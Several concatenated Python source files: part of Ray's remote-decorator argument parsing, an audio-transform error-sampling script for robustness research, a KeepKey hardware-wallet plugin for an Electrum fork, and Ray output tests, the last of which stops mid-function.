crashes unexpectedly. The minimum valid value is 0,
the default is 4, and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
"runtime_env",
"retry_exceptions",
"placement_group",
"concurrency_groups",
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
placement_group = kwargs.get("placement_group", "default")
retry_exceptions = kwargs.get("retry_exceptions")
concurrency_groups = kwargs.get("concurrency_groups")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
placement_group=placement_group,
worker=worker,
retry_exceptions=retry_exceptions,
concurrency_groups=concurrency_groups or [])
|
sample_error.py
|
import sys
import numpy as np
import random
import argparse
from operator import itemgetter
import multiprocessing as mp
from tqdm import tqdm
import os
import librosa
from transforms import scale_volume, shift
sys.path.append('..')
from util import str2bool, split, lmap # noqa: E402
sys.path.append('./GCommandsPytorch')
from gcommand_loader import find_classes, make_dataset # noqa: E402
def get_dataset():
"""
Returns
-------
a dataset which is a list of tuples (path, label)
"""
path = "./GCommandsPytorch/data/train"
classes, class_to_idx = find_classes(path)
data = make_dataset(path, class_to_idx)
return data
def spect_transform(y, sr, window_size=.02, window_stride=.01, window='hamming', max_len=101):
n_fft = int(sr * window_size)
win_length = n_fft
hop_length = int(sr * window_stride)
# STFT
D = librosa.stft(y, n_fft=n_fft, hop_length=hop_length,
win_length=win_length, window=window)
spect, phase = librosa.magphase(D)
spect_log = np.log1p(spect)
return spect, spect_log
def transform(y, sr, a, b, args):
"""
Parameters
----------
y : the sampled audio data
sr : sample rate
a : attacker parameter
b : smoothing parameter
args : args struct
Returns
-------
difference between interpolated and non-interpolated data
"""
t = {'volume': scale_volume,
'pitch_shift': shift}[args.trafo]
y_a, _ = t(y, sr, a)
y_a_b, _ = t(y_a, sr, b)
y_ab, _ = t(y, sr, a + b)
#assert np.all(y_a_b < 32768)
#assert np.all(y_ab < 32768)
#y_ab /= 32768
#y_a_b /= 32768
diff = y_a_b - y_ab
s_y_a_b, l_s_y_a_b = spect_transform(y_a_b, sr)
s_y_ab, l_s_y_ab = spect_transform(y_ab, sr)
# compare the two transform orderings in the linear and log-magnitude
# spectrogram domains (matching the raw-waveform diff above)
spect_diff = s_y_a_b - s_y_ab
log_spect_diff = l_s_y_a_b - l_s_y_ab
return diff, spect_diff, log_spect_diff
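# Comment-only sketch of how `transform` is driven below; the file path is
# hypothetical and `args` is assumed to be the argparse namespace built in
# __main__ (only args.trafo is read here):
#
#   y, sr = librosa.load("some_utterance.wav", sr=None)
#   a = np.random.uniform(-args.alpha_min_max, args.alpha_min_max)  # attacker parameter
#   b = np.random.normal(0, args.beta_std)                          # smoothing parameter
#   diff, spect_diff, log_spect_diff = transform(y, sr, a, b, args)
#   print(np.linalg.norm(diff, ord=np.inf))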
def run(k, args, xs, conn):
"""
Parameters
----------
k : index of the worker process
args : struct of all arguments
xs: list of ids (int) of data points
conn : pipe connection to the main process
This function is run as a separate worker process: it iterates
through all x in xs, samples errors for each, and reports them
back to the main process via conn.
"""
np.random.seed(1000 * args.seed + k)
data = lmap(itemgetter(0), get_dataset())
a_min = -args.alpha_min_max
a_max = args.alpha_min_max
for i in xs:
path = data[i]
y, sr = librosa.load(path, sr=None)
for _ in range(args.K):
a = np.random.uniform(a_min, a_max)
b = np.random.normal(0, args.beta_std)
diff, spect_diff, l_spect_diff = transform(y, sr, a, b, args)
l1 = np.linalg.norm(diff, ord=1)
l2 = np.linalg.norm(diff, ord=2)
linf = np.linalg.norm(diff, ord=np.inf)
ret = [i, a, b, l1, l2, linf]
s_l1 = np.linalg.norm(np.ravel(spect_diff), ord=1)
s_l2 = np.linalg.norm(np.ravel(spect_diff), ord=2)
s_linf = np.linalg.norm(np.ravel(spect_diff), ord=np.inf)
l_s_l1 = np.linalg.norm(np.ravel(l_spect_diff), ord=1)
l_s_l2 = np.linalg.norm(np.ravel(l_spect_diff), ord=2)
l_s_linf = np.linalg.norm(np.ravel(l_spect_diff), ord=np.inf)
ret.extend([s_l1, s_l2, s_linf, l_s_l1, l_s_l2, l_s_linf])
conn.send(ret)
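# Comment-only sketch of the Pipe-based pattern that __main__ uses to drive run();
# the id list [0, 1, 2] is hypothetical:
#
#   parent_conn, child_conn = mp.Pipe()
#   p = mp.Process(target=run, args=(0, args, [0, 1, 2], child_conn))
#   p.start()
#   for _ in range(3 * args.K):                  # one row per (id, repetition) pair
#       ready = mp.connection.wait([parent_conn])[0]
#       print(ready.recv())                      # [i, a, b, l1, l2, linf, ...]
#   p.join()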
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-N', type=int, default=51088,
                    help='number of data points from the training data')
parser.add_argument('-K', type=int, default=100, help='number of parameter samples per data point')
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--trafo', choices=['pitch_shift', 'volume'],
default='volume', help='transformation')
parser.add_argument('--alpha_min_max', type=float, default=1.2,
                    help='attacker parameter between 1/x and x')
parser.add_argument('--beta_std', type=float, default=0.3, help='standard deviation for beta')
parser.add_argument('-p', type=int, default=16, help='processors')
parser.add_argument('--write', type=str2bool, default=True, help='write to file')
args = parser.parse_args()
np.random.seed(args.seed)
random.seed(args.seed)
data = get_dataset()
L = len(data)
N = min(L, args.N)
I = list(range(L))
samples = list(random.sample(I, N))
sample_chunks = list(split(samples, args.p))
pipes = [mp.Pipe() for i in range(args.p)]
ps = [mp.Process(target=run, args=(i, args, sample_chunks[i], pipes[i][1]))
for i in range(args.p)]
receivers = [p for p, _ in pipes]
for p in ps:
p.start()
os.makedirs("sampling", exist_ok=True)
fn = f"{args.trafo}_{N}_{args.K}_{args.alpha_min_max}_{args.beta_std}_{args.seed}.csv"
fn = os.path.join('sampling', fn)
f = open(fn, "w") if args.write else sys.stdout
R = 0
M = N * args.K
with tqdm(total=M) as pbar:
while R < M:
results = mp.connection.wait(receivers, timeout=1)
for r in results:
res_tuple = r.recv()
print(", ".join(map(str, res_tuple)), file=f)
R += 1
pbar.update(1)
f.flush()
for r in receivers:
r.close()
for p in ps:
p.join()
if args.write:
f.close()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_deeponion.util import bfh, bh2u, UserCancelled
from electrum_deeponion.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum_deeponion import constants
from electrum_deeponion.i18n import _
from electrum_deeponion.plugins import BasePlugin
from electrum_deeponion.transaction import deserialize, Transaction
from electrum_deeponion.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_deeponion.wallet import Standard_Wallet
from electrum_deeponion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
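# Note on the change-output handling above: tx.output_info maps an output address
# to (index, xpubs, m), where index is a (change, n) pair on the keystore's
# derivation path, so index[0] == 1 means the output pays back to the internal
# ("change") chain, i.e. <derivation>/1/n. Such an output is described to the
# device by its derivation path (create_output_by_derivation) so the device can
# recognise it as change and avoid showing it to the user, while every other
# output is sent as a plain address (create_output_by_address).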
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_output.py
|
import subprocess
import sys
import pytest
import re
import signal
import time
import os
import ray
from ray._private.test_utils import (run_string_as_driver_nonblocking,
run_string_as_driver)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_infeasible():
script = """
import ray
import time
ray.init(num_cpus=1)
@ray.remote(num_gpus=1)
def foo():
pass
x = foo.remote()
time.sleep(15)
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" in out_str
assert "Error: No available node types can fulfill" in out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_warn_deadlock():
script = """
import ray
import time
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
b = A.remote()
time.sleep(25)
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" in out_str
assert "Warning: The following resource request cannot" in out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_autoscaler_no_spam():
script = """
import ray
import time
# Check that there are no false positives with custom resources.
ray.init(num_cpus=1, resources={"node:x": 1})
@ray.remote(num_cpus=1, resources={"node:x": 1})
def f():
time.sleep(1)
print("task done")
ray.get([f.remote() for _ in range(15)])
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str, err_str)
assert "Tip:" not in out_str
assert "Tip:" not in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_actor(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self):
self.x = module.temporary_python_file()
a = Foo.remote()
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The actor with name Foo failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_task(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def foo():
return module.temporary_python_file()
ray.get(foo.remote())
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
print(out_str)
print(err_str)
assert "ModuleNotFoundError: No module named" in err_str
assert "RuntimeError: The remote function failed to import" in err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_worker_stdout():
script = """
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
def foo(out_str, err_str):
print(out_str)
print(err_str, file=sys.stderr)
ray.get(foo.remote("abc", "def"))
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
err_str = proc.stderr.read().decode("ascii")
assert out_str.endswith("abc\n"), out_str
assert "(foo pid=" in out_str, out_str
assert err_str.split("\n")[-2].endswith("def")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_core_worker_error_message():
script = """
import ray
import sys
ray.init(local_mode=True)
# In local mode this generates an ERROR level log.
ray._private.utils.push_error_to_driver(
ray.worker.global_worker, "type", "Hello there")
"""
proc = run_string_as_driver_nonblocking(script)
err_str = proc.stderr.read().decode("ascii")
assert "Hello there" in err_str, err_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_disable_driver_logs_breakpoint():
script = """
import time
import os
import ray
import sys
import threading
ray.init(num_cpus=2)
@ray.remote
def f():
while True:
time.sleep(1)
print("hello there")
sys.stdout.flush()
def kill():
time.sleep(5)
sys.stdout.flush()
time.sleep(1)
os._exit(0)
t = threading.Thread(target=kill)
t.start()
x = f.remote()
time.sleep(2) # Enough time to print one hello.
ray.util.rpdb._driver_set_trace() # This should disable worker logs.
# breakpoint() # Only works in Py3.7+
"""
proc = run_string_as_driver_nonblocking(script)
out_str = proc.stdout.read().decode("ascii")
num_hello = out_str.count("hello")
assert num_hello >= 1, out_str
assert num_hello < 3, out_str
assert "Temporarily disabling Ray worker logs" in out_str, out_str
# TODO(ekl) nice to test resuming logs too, but it's quite complicated
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize("file", ["stdout", "stderr"])
def test_multi_stdout_err(file):
if file == "stdout":
file_handle = "sys.stdout"
else: # sys.stderr
file_handle = "sys.stderr"
script = f"""
import ray
import sys
ray.init(num_cpus=1)
@ray.remote
def foo():
print(file={file_handle})
@ray.remote
def bar():
print(file={file_handle})
@ray.remote
def baz():
print(file={file_handle})
ray.get(foo.remote())
ray.get(bar.remote())
ray.get(baz.remote())
"""
proc = run_string_as_driver_nonblocking(script)
if file == "stdout":
out_str = proc.stdout.read().decode("ascii")
else:
out_str = proc.stderr.read().decode("ascii")
assert "(foo pid=" in out_str, out_str
assert "(bar pid=" in out_str, out_str
assert "(baz pid=" in out_str, out_str
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@pytest.mark.parametrize("file", ["stdout", "stderr"])
def test_actor_stdout(file):
if file == "stdout":
file_handle = "sys.stdout"
else: # sys.stderr
file_handle = "sys.stderr"
script = f"""
import ray
import sys
ray.init(num_cpus=2)
@ray.remote
class Actor1:
def f(self):
print("hi", file={file_handle})
@ray.remote
class Actor2:
def __init__(self):
print("init", file={file_handle})
self.name = "ActorX"
def f(self):
print("bye", file={file_handle})
def __repr__(self):
return self.name
a = Actor1.remote()
ray.get(a.f.remote())
b = Actor2.remote()
ray.get(b.f.remote())
"""
proc = run_string_as_driver_nonblocking(script)
if file == "stdout":
out_str = proc.stdout.read().decode("ascii")
else:
out_str = proc.stderr.read().decode("ascii")
print(out_str)
assert "hi" in out_str, out_str
assert "(Actor1 pid=" in out_str, out_str
assert "bye" in out_str, out_str
assert re.search("Actor2 pid=.*init", out_str), out_str
assert not re.search("ActorX pid=.*init", out_str), out_str
assert re.search("ActorX pid=.*bye", out_str), out_str
assert not re.search("Actor2 pid=.*bye", out_str), out_str
def test_output():
# Use subprocess to execute the __main__ below.
outputs = subprocess.check_output(
[sys.executable, __file__, "_ray_instance"],
stderr=subprocess.STDOUT).decode()
lines = outputs.split("\n")
for line in lines:
print(line)
if os.environ.get("RAY_MINIMAL") == "1":
# Without "View the Ray dashboard"
assert len(lines) == 1, lines
else:
# With "View the Ray dashboard"
assert len(lines) == 2, lines
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# TODO: fix this test to support minimal installation
@pytest.mark.skipif(
os.environ.get("RAY_MINIMAL") == "1",
reason="This test currently fails with minimal install.")
def test_output_on_driver_shutdown(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=16)
# many_ppo.py script.
script = """
import ray
from ray.tune import run_experiments
from ray.tune.utils.release_test_util import ProgressCallback
num_redis_shards = 5
redis_max_memory = 10**8
object_store_memory = 10**9
num_nodes = 3
message = ("Make sure there is enough memory on this machine to run this "
"workload. We divide the system memory by 2 to provide a buffer.")
assert (num_nodes * object_store_memory + num_redis_shards * redis_max_memory <
ray._private.utils.get_system_memory() / 2), message
# Simulate a cluster on one machine.
ray.init(address="auto")
# Run the workload.
run_experiments(
{
"ppo": {
"run": "PPO",
"env": "CartPole-v0",
"num_samples": 10,
"config": {
"framework": "torch",
"num_workers": 1,
"num_gpus": 0,
"num_sgd_iter": 1,
},
"stop": {
"timesteps_total": 1,
},
}
},
callbacks=[ProgressCallback()])
"""
proc = run_string_as_driver_nonblocking(script)
# Make sure the script is running before sending a sigterm.
with pytest.raises(subprocess.TimeoutExpired):
print(proc.wait(timeout=10))
print(f"Script is running... pid: {proc.pid}")
# Send multiple signals to terminate it like real world scenario.
for _ in range(10):
time.sleep(0.1)
os.kill(proc.pid, signal.SIGINT)
try:
proc.wait(timeout=10)
except subprocess.TimeoutExpired:
print("Script wasn't terminated by SIGINT. Try SIGTERM.")
